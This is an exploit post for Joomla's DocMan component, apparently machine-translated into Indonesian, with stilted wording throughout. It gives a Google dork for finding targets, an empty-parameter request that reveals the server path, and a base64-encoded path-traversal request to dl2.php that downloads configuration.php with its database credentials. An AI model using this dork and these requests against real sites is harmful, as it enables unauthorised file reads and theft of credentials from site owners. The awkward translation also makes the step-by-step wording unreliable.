Joomla com_docman penuh Jalur Pengungkapan & Pengungkapan File Lokal / Sertakan
# Joomla docman Komponen 'com_docman' Path penuh Pengungkapan (FPD) & Pengungkapan File Lokal / Sertakan (LFD / LFI)
# CWE: cwe-200 (FPD) cwe-98 (LFI / LFD)
# Risiko: Tinggi
# Penulis: Hugo Santiago dos Santos
# Hubungi: hugo.s@linuxmail.org
# Tanggal: 13/07/2015
# Penjual Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl: "/ komponen / com_docman / dl2.php"
# Xploit (FPD):
Dapatkan satu sasaran dan hanya men-download dengan parameter kosong:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=
Dalam judul akan terjadi Penuh Jalan Pengungkapan server.
# Xploit (LFD / LFI):
http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
Mari Xploit ...
Pertama kita perlu menggunakan Xploit FPD untuk melihat jalan target, setelah itu kita akan Insert 'configuration.php' file database konfigurasi dan encode di Base64:
../../../../../../../target/www/configuration.php <= Tidak Siap
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Siap!
Dan Sekarang kita memiliki file konfigurasi ...
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.